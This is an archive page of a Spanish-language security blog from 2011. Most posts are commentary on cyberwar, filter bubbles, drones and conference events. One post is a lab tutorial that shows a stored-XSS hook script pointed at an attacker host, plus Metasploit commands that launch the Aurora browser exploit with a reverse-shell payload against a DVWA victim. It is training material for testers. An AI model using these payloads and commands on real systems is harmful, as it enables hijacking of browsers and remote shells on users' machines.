miércoles, 7 de diciembre de 2011

Google: Relevancia de la Información o Censura

Redes Sociales, Medios de Prensa y hasta Buscadores, hacen uso de algoritmos de relevancia para filtrar la información "que creen" nos interesa. ¿Estamos frente a un nuevo tipo de censura?

"Una ardilla muriendo en el frente de tu casa, puede ser mas relevante para tus intereses en este momento, que personas muriendo en Africa."
Mark Zuckerberg, Facebook

Eli Pariser, un reconocido activista político, dió una interesante charla en TED sobre esta problemática:


Pariser sostiene que mientras empresas en Internet se esfuerzan por adaptar sus servicios (incluyendo noticias y resultados de búsqueda) a nuestros gustos personales, surge la peligrosa consecuencia de quedar atrapados en una "burbuja de filtros", que obstaculice nuestra visión del mundo.

Casualmente hace unas semanas, cuando Alejandro Eguía de Spamloco.net estuvo en el COMBAT Training, me comentaba sobre la dificultad del SEO con Google, ya que una persona sentada al lado de otra, realizando la misma búsqueda, podría obtener resultados diferentes, a causa de estos algoritmos que adaptan los resultados a nuestros gustos personales.

Pariser escribió el libro "The Filter Bubble: What the Internet Is Hiding from You", profundizando sobre este tema, y planteando la necesidad de que los buscadores informen como funcionan sus algoritmos de relevancia, o brinden la posibilidad al usuario de elejir si quiere continuar en la burbuja o no. ¿Qué opinan?



Publicado por Leonardo Pigñer en www.KUNGFOOSION.com // Seguime en Twitter: @KFS

miércoles, 30 de noviembre de 2011

Exitosa Primer Edición de E-Security Conferences en Ecuador

Paso exitosamente la primer edición de la conferencia e-security, en la hermosa ciudad de Guayaquil, Ecuador.

Aprovecho para felicitar nuevamente a los organizadores, Roberto Olaya de la empresa HCK-S, junto a la Cámara de Comercio de Guayaquil, por la excelente organización del evento. Un lujo para una primera edición! :)

También fue un placer encontrarme con amigos como @DragonJAR @jcaitf y @chemaalonso, y haber conocido a grandes profesionales como Alvaro Andrade y Gabriel Waise. Con todos ellos armamos un grupo, que cual viaje de egresados, paseamos por todo Guayaquil.

La siguiente foto es en el faro del cerro Santa Ana, al cual llegas luego subir 444 escalones. Afortunadamente durante todo el trayecto, hay una innumerable cantidad de bares en donde aplacar la sed ;)


Durante el evento, me toco dar la primer charla, la que fue retitulada por los organizadores "Defendiendo Nuestro Router Cisco" :D La idea de la charla fue crear una conciencia de seguridad sobre los routers Cisco, los que muchas veces no son tenidos en cuenta al momento de segurizar una red.


Mas haya de mostrar los clásicos errores de configuración, contraseñas por default, y puertas traseras con GRE y TCL, me parece que lo más interesante fue presentar estadísticas reales en Ecuador. Para ello estuve alrededor de 2 semanas escaneando todas las redes IPv4 de Ecuador por SNMP default, de cuyos resultados extraje las versiones de IOS utilizadas.

Como podrán ver en los slides, de los 1.212 routers Cisco con SNMP default que encontré en Ecuador, el IOS más utilizado es la versión 12.2 que ya no posee mantenimiento por Cisco. w00t!

También es muy interesante el resto de dispositivos con SNMP default encontrados en todas las redes de Ecuador. Durante la charla, solamente presente los resultados de Cisco, porque ese era el propósito, pero voy a preparar las estadísticas del total de los resultados, y los postearé en este blog dentro de poco.

Luego de que agregue algunas features, y haga el código un poco más bello, también voy a publicar los scripts que arme para esta presentación.

Un gran abrazo para todos los amigos de Ecuador!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com // Seguime en Twitter: @KFS

viernes, 11 de noviembre de 2011

CHINA, ¿Realmente una Ciberpotencia?

Periódicamente escuchamos sobre ciberataques realizados por China a otras naciones, pero un reciente estudio sugiere que las capacidades de ciberguerra de China están décadas por detrás de otros países.


Según el análisis de Desmond Ball, profesor del Centro de Estudios Estratégicos y de Defensa, de la Universidad Nacional de Australia, las capacidades de ciberguerra de China son bastante rudimentarias.

Basándose en publicaciones existentes, el informe hace un detallado análisis de todos los supuestos ciberataques realizados por China, en los que si bien se evidencia cierta sofisticación, están muy lejos de obras de ingeniería, con millones de dólares de inversión, como Stuxnet.

¿Por qué entonces se habla tanto de China como nueva Ciberpotencia? Todos recordamos la Operación Aurora, y las nuevas 3 letras de moda surgidas tras los ataques chinos: APT (Advanced Persistent Threat).

Por un lado, es cierto que los ataques provenientes de China aumentaron exponencialmente. Hace solo unos días, se presento un reporte al Congreso de los EEUU llamado "Foreign Spies Stealing US Economic Secrets in Cyberspace", en donde se acusa a actores de China y servicios de inteligencia de Rusia, de exfiltrar información confidencial de empresas de tecnología, contratistas de defensa, empresas químicas, agroindustriales, etc.  

Pero en el caso de China, los cientos de exitosos ataques que diariamente logran exfiltrar terabytes de información de empresas de EEUU y Europa Occidental, no necesariamente significa que tengan un nivel de sofisticación como el de Stuxnet, que hoy en día es el parámetro más alto que tenemos, sino que como toda amenaza persistente avanzada, eventualmente tendrá éxito.

También es difícil medir el poder de ciberguerra de China, ya que no todos los ataques son orquestados por el gobierno, o por el departamento de ciberguerra del "Ejército de Liberación del Pueblo", sino que también hay una gran cantidad de "hackers patrióticos" que actúan por su cuenta.

Si como indica el análisis de Desmond Ball, las capacidades de ciberguerra de China son bastante rudimentarias, seguramente tendremos oportunidad de verlo en el futuro, mientras tanto es innegable que China se convirtió en uno de los actores principales en lo que respecta al ciberespionaje con fines económicos.


REFERENCIAS:
- China’s Cyber Warfare Capabilities
- Foreign Spies Stealing US Economic Secrets in Cyberspace
- Is China really 'Cyberdragon's?


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com // Seguime en Twitter: @KFS

jueves, 3 de noviembre de 2011

Ya llega e-security conferences en Ecuador

Llega la primer edición de "e-security conferences: descifrando el código hacker", del 25 al 27 de Noviembre, en la hermosa ciudad de Guayaquil, Ecuador.

El evento esta organizado por HCKS Security, la Cámara de Comercio de Guayaquil y la ESPOL, a quienes agradezco por haberme invitado a participar :)

Pueden seguir todas las novedades de la conferencia a través del Twitter oficial del evento: @e-security2011
   
Nos vemos en Guayaquil del 25 al 27 de Noviembre!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com // Seguime en Twitter: @KFS

lunes, 31 de octubre de 2011

¿Redes Sociales para Ciberpropaganda en Latinoamérica?

Un reciente informe del Comité de Relaciones Exteriores del Senado de EEUU, plantea la necesidad de impulsar el crecimiento de las Redes Sociales en Latinoamérica.


El informe plantea la importancia de las Redes Sociales en la actualidad, resaltando los hechos de la "Primavera Arabe", donde miles de ciudadanos usaron Facebook, Twitter y Google para acelerar cambios políticos en países de Medio Oriente. También habla de desafíos similares que enfrentaría Latinoamérica, citando como ejemplo de "casos extremos" a Venezuela, Cuba y Nicaragua.


ESTADISTICAS

El documento posee gran cantidad de estadísticas sobre la utilización de Internet y Redes Sociales en Latinoamérica, aquí algunas:
  • Latinoamérica podría superar a los EEUU en la utilización de Redes Sociales debido al crecimiento de la telefonía móvil con acceso a internet.
  • El 82% de los latinoamericanos que tienen Internet utilizan Redes Sociales, convirtiéndolos en la segunda población más activa después de los EEUU.
  • Facebook tiene 100 millones de usuarios en Latinoamérica, siendo los 5 países con más usuarios: Brasil, Méjico, Colombia, Argentina y Venezuela.
  • Brasil tiene 25 millones de usuarios de Facebook, mientras que la red social Orkut de Google, que nunca fue popular en EEUU, es la más popular en Brasil con 46 millones de usuarios.
  •  Latinoamérica posee una tasa de penetración de telefonía móvil del 90%. El siguiente gráfico, expone la cantidad de móviles por cada 100 personas:


Se puede apreciar varios países de Latinoamérica, incluyendo a Panamá, Argentina, Honduras y Uruguay, que tienen más de un móvil cada 100 personas, mientras que los EEUU llegan a 97 móviles cada 100 personas.
  • Para el 2014, el acceso a conexiones de Banda Ancha podría exceder el 30%, mientras que en la actualidad, el acceso cada 100 personas, es el siguiente:


El acceso a Banda Ancha en Latinoamérica es bastante bajo si lo comparamos al de telefonía móvil. Mientras que también esta bastante por detrás de EEUU, que posee 28 suscripciones de Banda Ancha cada 100 personas.


RECOMENDACIONES

Luego de plantear el estado de situación tecnológica en Latinoamérica, el documento continúa con algunas recomendaciones para que los EEUU pueda expandir las Redes Sociales en Latinoamérica, con el objetivo de difundir sus principios democráticos:
  • Implementar programas de capacitación y alfabetización tecnológica.
  • Proveer soporte para que los desarrolladores locales puedan crear  contenidos en su propio idioma.
  • Generar contenidos que requieran poca infraestructura tecnológica o ancho de banda.
  • Evaluar los usos negativos que se les podría dar a estas tecnologías, como fines antidemocráticos.
  • Evaluar las preocupaciones de miembros de la industria, respecto a la  privacidad de sus usuarios, y que demasiada interferencia del gobierno pueda afectar sus negocios.

Algunos medios de prensa norteamericanos, cuestionan que sea posible invertir en políticas de capacitación y desarrollo de infraestructura tecnológica en Latinoamérica, cuando actualmente los EEUU se encuentra viviendo una crisis tan importante.


CONCLUSION

La conclusión del documento es por demás interesante, principalmente porque plantea los profundos cuestionamientos de la industria de la tecnología hacia el gobierno, en relación a estar asociados para influir en cambios políticos. Cita por ejemplo, los siguientes ejemplos:

  • Muchas de las empresas detrás de las Redes Sociales, se ven a si mismas como "startups", aún cuando sus acciones en la bolsa, puedan costar cientos de millones de dólares. Por esta razón, no poseen personal en países extranjeros para manejar las relaciones con gobiernos y ciudadanos.
  • La industria posee una perspectiva de "neutralidad política", por lo que no desea estar asociado al gobierno, como otra herramienta de su política exterior, ya que esto podría ir en detrimento de sus negocios internacionales.
  • La actitud dominante de la industria de la tecnología con respecto al gobierno no es buena. Un anónimo de esta industria que fue entrevistado, decía lo siguiente: "Consideramos al gobierno como un mal necesario, de la misma forma en que la gente mira a los policías de tráfico. Si te detienen por exceso de velocidad, debés pagar la multa."

TEORIAS CONSPIRATIVAS

Para quienes gustan de las teorías conspirativas, les recomiendo este video de Russia Today donde hablan de la reciente utilización de las Redes Sociales en la "Primavera Arabe" de Libia:


Según Russia Today, solo el 5% de los ciudadanos libios tienen acceso a Internet, con una cantidad de usuarios de Twitter tan pequeña que era imposible de calcular. Hasta Febrero de este año, cuando hubo un resurgimiento de una gran cantidad de usuarios de Twitter, y todos  pidiendo por la intervención extranjera en su país.

Dos artículos de los diarios Daily Mail y The Guardian de Inglaterra, comentan que el Ejército de los EEUU (U.S. Central Command) le dió un contrato por 2,8M USD a una nueva empresa de Los Angeles, California llamada Ntrepid, para que desarrolle un software que permita crear identidades falsas en Redes Sociales.

Algunas de las características de este software son las siguientes:
  • No operará en inglés, por que iría en contra de las leyes de EEUU, por lo que sólo funcionará en Arabe, Farsi y Urdu.
  • Los usuarios del software podrían utilizarlo sin temor a ser descubiertos por adversarios con conocimientos sofisticados.

REFERENCIAS:
- Washington Post: U.S. should ‘like’ Latin America’s ‘friend’-ing social media
- Report: Latin American governments need to 'friend' social media and technology
- Libya fake Twitter ID explosion part of 'cyber war for democracy'?
- Combating jihadists and free speech: How the U.S. military is using fake online profiles to spread propaganda
- Revealed: US spy operation that manipulates social media


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com // Seguime en Twitter: @KFS

jueves, 20 de octubre de 2011

¿Ciberguerra a Libia?

Un reciente artículo del New York Times reporta que el gobierno de EEUU consideró lanzar una ciberataque contra Libia.


Dice el NYT, que previamente a los ataques aéreos realizados por EEUU en Marzo, el gobierno de este país consideró lanzar un ciberataque para dañar los enlaces de comunicaciones militares, y que estos no puedan dar aviso a las baterías de misiles, sobre los ataques que luego realizarían los aliados de la OTAN.

Curiosamente, este artículo publicado el 17 de Octubre por el New York Times, sobre  ataques aéreos a Libia que se realizaron en Marzo, llega mientras las redes militares de EEUU se encuentran en el ojo de la tormenta, por el artículo de Wired del 7 de Octubre, donde daba a conocer que un virus infecto toda la flota de aviones no tripulados que actualmente se utiliza en Medio Oriente para tareas de inteligencia y ataques aéreos.

La nota del NYT continúa, comentando los cuestionamientos que surgieron sobre precedentes que un ataque como este podría generar, especialmente para Rusia y China. También, sobre si el presidente Obama podría proceder con un ataque como este sin informar al Congreso.

Si bien todos conocemos "precedentes" como la Operación Aurora o Stuxnet, hasta ahora ningún gobierno admitió estar detrás de un ciberataque a otro país. Por otro lado, la aprobación del ciberataque por parte del Congreso es bastante curiosa, porque tampoco se solicito autorización para realizar los ataques aéreos en un primer lugar, según otro artículo del New York Times en Marzo.

Continúa el NYT preguntándose, en que situación los EEUU debería utilizar un ciberataque, y hace mención al posible origen norteamericano-israelí de Stuxnet. Un poco más adelante en el artículo, nos encontramos con una frase por demás interesante:

“These cybercapabilities are still like the Ferrari that you keep in the garage and only take out for the big race and not just for a run around town, unless nothing else can get you there,”

No hay dudas de que la Ferrari dio un paseo por Irán. Hay una charla muy interesante en TED de Ralph Langner sobre Stuxnet, donde al final de su exposición lanza dos frases bastante contundentes:

"My opinion is that Mossad is involved." y luego, "There is only one leading source, and that is the United States."

El artículo del NYT continúa sobre dudas respecto a si un ciberataque se puede adaptar a las leyes de guerra actuales de los EEUU, o necesitaría de un tratamiento diferente, y si es recomendable dejar conocer cuales son las  capacidades de ciberguerra que este país posee.

Finalmente el ciberataque no se realizo, pero la red de defensa aérea de Libia fue seriamente dañada mediante ataques convencionales.

Un artículo muy interesante del New York Times, recomendado!

REFERENCIAS:
- NYT: U.S. Debated Cyberwarfare in Attack Plan on Libya
- WIRED: Computer Virus Hits U.S. Drone Fleet
- NYT: U.S.-Led Assault Nears Goal in Libya
- TED: Ralph Langner: Cracking Stuxnet, a 21st-century cyber weapon
- Virus Incident Sheds Light On U.S. Cyber Defense
- KUNGFOOSION: Estalló la CyberGuerra!

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

martes, 4 de octubre de 2011

UAV's Argentinos en TECNÓPOLIS

Los UAV's Argentinos están presentes en TECNÓPOLIS, en el pabellón Ai10:  "Los Aviones No Tripulados de Argentina".

 
TECNÓPOLIS es una megamuestra de ciencia, tecnología, industria y arte, que fue pensada para ser el final de las celebraciones del Bicentenario de Argentina. La exhibición cuenta con más de 100 stands que están organizados en cinco continentes: Agua, Tierra, Aire, Fuego e Imaginación. En el continente Aire, podemos encontrar el pabellón Ai10 con "Los Aviones No Tripulados de Argentina".

Previamente ya había escrito sobre UAV's, y los desarrollos que podemos encontrar en Argentina, pero hasta TECNÓPOLIS, nunca había tenido la oportunidad de estar cerca de estos aparatos.

Posts anteriores:
- Helicóptero Radio Controlado con Video de Alta Definición
- UAVs en Argentina
- Más Fácil que Capturar Video de Aviones Espía

Dentro de los UAV's militares, podemos encontrar los famosos "Guardián" de la Armada, y "LIPAN" del Ejercito. Desde hace un tiempo, el Ejercito Argentino esta trabajando con el INTI, para el desarrollo de un software para el seguimiento automático de antena para el LIPAN, y se espera dentro de poco el nuevo modelo XM4, que remplace al actual LIPAN M3.


Tampoco podía faltar la empresa privada mas representativa del desarrollo de UAV's en Argentina, Nostromo Defensa, presentando su nuevo UAV, el "CORBRA".


Las características principales del CORBRA son su gran capacidad de carga útil (payload), y su gran autonomía de vuelo, 16 horas. Esta diseñado como UAV de aplicaciones de monitoreo terrestres, con una carga útil de un sensor hiperespectral y un radar láser (LIDAR).



Algunas especificaciones del CORBRA:
- Peso Max al despegue : 150 kg
- Carga Util : 40 Kg
- Autonomía : 16 hs
- Alcance operativo : 150 km (LOS)
- Potencia : 28 HP
- Envergadura : 7 mts
- Largo : 4.5 Mts

Es interesante observar, que desde hace algunos años, son varios los países de Latinoamérica que poseen desarrollos de UAV propios, aunque pocos han logrado introducirse con éxito en el mercado de UAV's mundial.

La empresa cordobesa Nostrodomo Defensa, es un caso de éxito local, logrando vender sus desarrollos al USA DoD, entre otros. En otra escala,  la empresa israelí AEL Sistemas (Elbit Systems), uno de los líderes mundiales del mercado, llego a un acuerdo con la aeronáutica brasileña Embraer, para crear una empresa en Brasil para el desarrollo de UAV's.

Según un estudio de Teal Group, el mercado mundial de UAV's, duplicará su gasto anual de 4,9 billones de dólares, a 11,5 billones, totalizando casi 80 billones en los próximos 10 años. Se estima que el mercado de UAV's, será la industria más dinámica dentro de la aeronáutica en los próximos años.

Otro dato interesante, es que comienzan a nacer empresas que se dedican exclusivamente al desarrollo de payloads para UAV's, sin mencionar que no van a tardar en aparecer las soluciones Anti-UAV.

Los también llamados "drones", han sido utilizados en Afganistán, Irak y recientemente en Libia, y sin dudas van a ser los actores principales de las futuras guerras. Si tomamos en cuenta los miles de millones de dólares que mueve esta industria, próximamente nos vamos a encontrar con avances tecnológicos muy importantes.

Próximamente más artículos relacionados a TECNÓPOLIS, si todavía no fueron se los recomiendo 100%! 


REFERENCIAS:
- TECNÓPOLIS
- Nostrodomo Defensa - UAV
- INTI - Nuevo software para naves no tripuladas
- Embraer y AEL crean la compañía Harpia para la fabricación y comercialización de UAV en Brasil
- Helicóptero Radio Controlado con Video de Alta Definición
- UAVs en Argentina
- Más Fácil que Capturar Video de Aviones Espía


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

domingo, 25 de septiembre de 2011

ekoparty 2011 - Join The Resistance!

Increíblemente paso otra edición de la ekoparty, con muchísimas anécdotas e historias, tantas, que son casi imposibles de contar en un blog.

Todos los años intentamos que la ekoparty tenga una "temática" diferente en su escenografía y en todo el merchandising. El año pasado tenía una temática "cyberpunk", y este año con tanto APT y Stuxnet, la temática elegida fue "cyberwarfare".

En el badge de todos los asistentes, y en muchas de las camisetas del evento, aparecía la imagen de un robot asesino que venía a eliminar a los asistentes de la ekoparty. Debajo del robot decía lo siguiente:

"We will never stop, until the humans are over, we don't know where you are ekoparty civilians, but we will find your headquarters and make you blow away"

Por supuesto, la primer víctima del robot asesino era Juliano Rizzo, quien junto a Thai Duong, iban a presentar "BEAST: Surprising crypto attack against HTTPS".


Luego del robot asesino, Juliano y Thai, nuevamente la rompieron! realizaron una demostración en vivo en donde descifraban HTTPS, robaban cookies de una sesión de Paypal, y luego, hijackeaban la cuenta. INCREIBLE!

A medida que la adrenalina vaya bajando, iré posteando más anécdotas, pero desde ya un enorme agradecimiento a todos por convertir a la ekoparty en la conferencia mas importante de seguridad en Latinoamérica, y según muchos conocedores dicen, una de las mejores del mundo. Gracias!

JOIN THE RESISTANCE!

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

domingo, 18 de septiembre de 2011

Ya llega la ekoparty 2011!

A partir de mañana, comienza la semana de actividades de la edición 2011 de la ekoparty, una semana de locos…!


Ultimamente encuentro mucho mas dinámico el "microblogging" a través de Twitter, por lo que los invito a seguir mis tweets en @KFS, para leer mi cobertura personal del evento, y por supuesto la cuenta oficial de @EKOPARTY.

Este blog se ha reinventado varias veces, de acuerdo a los intereses que he tenido a lo largo del tiempo, comenzó dedicado al análisis forense, luego paso al pentest, muchas cosas personales, cosas de BASE4, y creo que próximamente va a tener un nuevo giro en su temática, estoy seguro que les va a gustar… ;-)  

Recuerden seguir los tweets de @KFS y @EKOPARTY, y nos vemos la semana que viene!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

miércoles, 20 de julio de 2011

#1HackParaLosChicos - Jornada Solidaria

El próximo 26 de Julio de 2011, tendrá lugar la jornada solidaria #1HackParaLosChicos, enterate como participar!


De qué se trata?

#1HackParaLosChicos, surgió a partir de la unión de diferentes profesionales de seguridad de la información de la Argentina, cuyo espíritu solidario dio lugar a convenir en que era una gran idea realizar una jornada de seguridad en la cual se recauden Leche en Polvo y Juguetes.

Agenda del Evento

- Presentación del Evento 1HackParaLosChicos
- Seguridad en Dispositivos Móviles
- Presentación Argentina Cibersegura
- Seguridad vs Desarrolladores
- Filosofía Hacker
- Desventuras de Ser Paranoico 2.0
- Wifi @ HOME
- Técnicas de Infección de Malware
- La Familia en Internet
- Reputación Online
- Seguridad en Internet, padres e hijos

Cuándo y Dónde?

La jornada se realizará el 26 de Julio en las oficinas de Microsoft en Bouchard 710 4° piso, CABA, desde las 8.40 AM y hasta las 18 PM. (Ver Mapa)

Qué Donar ?

Dado que no se cobrará entrada, teniendo en cuenta las necesidades de quiénes recibirán las donaciones (chicos de 0 a 5 años), para asistir a la jornada hay que registrarse previamente y acercar lo siguiente:

- 1 Kilo de Leche en Polvo.
- 1 Juguete que ronde los $50 (apróx). Neutral en cuanto al género (nena o nene).

Algunos Ejemplos:
- Masas.
- Plastilinas.
- Juegos de mesa.
- Rompecabezas.
- Herramientas para dibujar.
- Juegos de encastre y estimulación temprana.

Durante la jornada, la logística de las donaciones estará a cargo de la Fundación Caminando Juntos, y el destinatario será uno de los "Centros Conin" del partido de San Martín.

Recordá, que para poder asistir es fundamental que te Registres.

Mas info en: http://1hackparaloschicos.org/

martes, 5 de julio de 2011

miércoles, 29 de junio de 2011

Slides de "Atacando Smartphones" en la Campus Party Colombia

Slides de la charla "Atacando Smartphones" dictada por Jerónimo Basaldúa y Lucas Duarte Wulfert en la Campus Party Colombia.

Anoche, Jerónimo y Lucas, dictaron la charla "Atacando Smartphones" en la Campus Party Colombia, y según me comentaron fue un verdadero éxito. Felicitaciones para ellos!

Seguramente cuando vuelvan, nos contarán que tal estuvo esta edición de la Campus Party, pero mientras tanto les dejo los slides de la charla, en la que yo aporte mi granito de arena con el humilde diseño gráfico ;-)


Las próximas charlas y talleres, que Jerónimo y Lucas van a dictar durante la Campus Party son:

- Viernes 1, 16:00: Atacando Infraestructuras Corporativas Wireless
- Miércoles 29, 21:45: Armado de Antenas Wireless y Wardriving

Estén atentos porque tal vez las transmitan en vivo!
 

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

miércoles, 13 de abril de 2011

Próximas Fechas de Capacitación!

A continuación tienen algunas de las próximas fechas de capacitaciones técnicas de BASE4 Security.


No se olviden de seguir a @base4sec en Twitter para estar enterados de todas las novedades y participar de próximas promociones.

Nos vemos en el COMBAT Training del 2 al 6 de Mayo en Buenos Aires!

jueves, 17 de marzo de 2011

Edición 2011 de SEGURINFO

Nuevamente BASE4 Security estuvo presente como sponsor en la edición 2011 de SEGURINFO en Argentina.

Al igual que en la ekoparty, BASE4 Security fue responsable de armar una red wireless segura para SEGURINFO. Quienes visitaron nuestro stand, pudieron observar en tiempo real todos los ataques que se estaban desarrollando, aunque para ser sincero, no es nada comparado con los que se veían en la ekoparty ;-)

Para continuar con la tradición de la empresa, fuimos en el único stand que tenia una barra de cerveza incorporada!


Estamos evaluando poner una en la oficina, aunque hay quienes dicen que podría llegar a afectar el rendimiento, mientras que otros dicen que por el contrario, con un par de cervezas encima trabajan mejor… 

Les dejo una foto de parte del team de BASE4 que estuvo presente en SEGURINFO:

@p4dawan, @kfs, Carlos Liteplo, @jbasaldua, Kosty Nayda, Luis Cruz, Sol Argento

Desde ya agradezco a todos los amigos que pasaron a saludar y a compartir una cerveza con nosotros! Espero que pronto también lo podamos hacer en la oficina ;-)
 

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

miércoles, 16 de febrero de 2011

Explotando XSS con Metasploit

En el siguiente post, vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.

XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una  descripción más detallada del framework aquí.


Jugando con XSSF

Para realizar estas pruebas vamos a utilizar el DVWA, un framework para testing de vulnerabilidades web, instalado sobre una VM  Windows XP y nuestro Backtrack 4 R2.

Lo primero que vamos a hacer es descargar el XSSF framework desde aquí y descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:

# Instalamos XSSF en Metasploit
cd /opt/metasploit/msf3
wget http://www.metasploit.com/redmine/attachments/596/XSSF.zip
unzip XSSF.zip
cd XSSF
cp -r data/ lib/ modules/ plugins/ ../

# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF


Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:

<script src=”http://IP_BACKTRACK:8888/loop?interval=5”></script>


Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.

Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción ;)

Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando "xssf_victims":


Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando "xssf_information victimID":


Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:

use auxiliary/xssf/alert
set VictimIDs 2
set AlertMessage "Game Over"

 

También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:

use exploit/windows/browser/ms10_002_aurora
set SRVPORT 80
set PAYLOAD windows/shell/reverse_tcp
set LHOST IP_BACKTRACK
set URIPATH dvwa/vulnerabilities/xss_s/

Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:

jobs
xssf_active_victims
xssf_exploit victimID jobID


Espero que les haya gustado mi primer post! :)

Referencias:
- http://www.metasploit.com/redmine/issues/2995
- http://www.dvwa.co.uk/


Publicado por Lucas Duarte Wulfert en www.KUNGFOOSION.com

martes, 8 de febrero de 2011

Nuevo Colaborador del Blog!

Tengo el verdadero placer de sumar al Ing. Lucas Duarte Wulfert, también conocido como p4dawan, como nuevo colaborador de este blog!


Desde hace algunos meses, Lucas trabaja como Security Consultant en el área de Servicios Profesionales de BASE4 Security. Quienes siguen este blog seguramente lo habrán visto en alguna foto como co-instructor del COMBAT Training.

Dentro de sus actividades diarias, Lucas realiza testings de Ethical Hacking y Penetration Testing, y actualmente se encuentra activamente investigando y actualizando el contenido de los trainings.

Lucas se encuentra cursando el Master de Seguridad Informática en la Universidad de Buenos Aires.

Sin ninguna duda, el amigo Lucas va a realizar interesantes aportes para los lectores de KUNGFOOSION.COM :-)

Twitter de Lucas: @p4dawan
 

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

lunes, 7 de febrero de 2011

Ninjas de "La Mitad del Mundo"

La semana pasada el COMBAT Training paso por Quito - Ecuador, también conocida como "La Mitad del Mundo"!

Fue un verdadero orgullo y honor haber tenido la oportunidad de dictar un training a la Fiscalía General del Estado de Ecuador, quienes constantemente se capacitan con la misión de combatir los delitos informáticos.

Hace pocos meses, cuando dictamos el COMBAT Training en Guayaquil me sorprendió el buen humor de los ecuatorianos, y lo termine de confirmar en Quito, con una semana que dejo muchísimas anécdotas e historias ;)

Los ganadores del CTF de esta edición fueron, Gabriel Cuestas, Carolina Salas y Luis Pavón. Felicitaciones!


Sin ninguna duda fue una de las finales mas peleadas que recuerdo… en un momento parecía que "EL PAPI" se llevaba la katana a su casa, pero a ultimo momento "EL GABO" tomo la delantera y lo gano, seguido por "TOTO" con una diferencia mínima. Mención especial se merece Pedro Ponce, también conocido como piter.php, que dio una gran batalla contra su archienemigo "EL PAPI" :P

Como era la primera vez que estaba en una fiscalía, no podía dejar pasar la oportunidad de cumplir mi sueño de ser JUEZ! Me vi tentado a dictar el training desde allí, pero no me dejaron… :D


Espero tener la oportunidad de próximamente volver a Ecuador, donde me encontré con un grupo de personas excelente!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

lunes, 17 de enero de 2011

Primer COMBAT Training en CHILE!

La semana pasada tuvo lugar la primer edición del COMBAT Training en Santiago de Chile, con un grupo de ninjas bastante competitivos!

De izquierda a derecha, p4dawan, Victor, Manuel, Freddy, Tamara, y abajo, Rodrigo I., Marco, kfs, Rodrigo S.M. y Pablo. Falto Alejandro en la foto, que a ultimo momento se tuvo que ir. 


Los ganadores del CTF de esta edición fueron, Manuel Moreno, Pablo Antonio Ramirez Hoffman y Rodrigo Santa Maria. Estuvo todo muy peleado durante toda la semana, y a ultimo momento Pablo "casi" le roba la gloria a Manuel, pero sin dudas cualquiera de los tres se lo merece ampliamente. Felicitaciones!

Los ninjas chilenos no solo tenían un muy buen nivel técnico, sino que también mucho humor, por lo que toda la semana fue muy divertida!

Algo que también descubrí, es que la capacidad de los chilenos para beber cerveza es comparable a la de los colombianos, toman muchísimo! El Viernes después del training fuimos a un bar, y se me ocurrió bromear con que tenían poca capacidad alcohólica… creo que terminanos tomando mas de 10 jarras de cerveza y fuimos los últimos en irnos del bar. Yo y mi bocota! :D

Un fuerte abrazo para todos los amigos de Chile!!

- Fotos del COMBAT en Chile
- Mas info del COMBAT Training


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

LinkWithin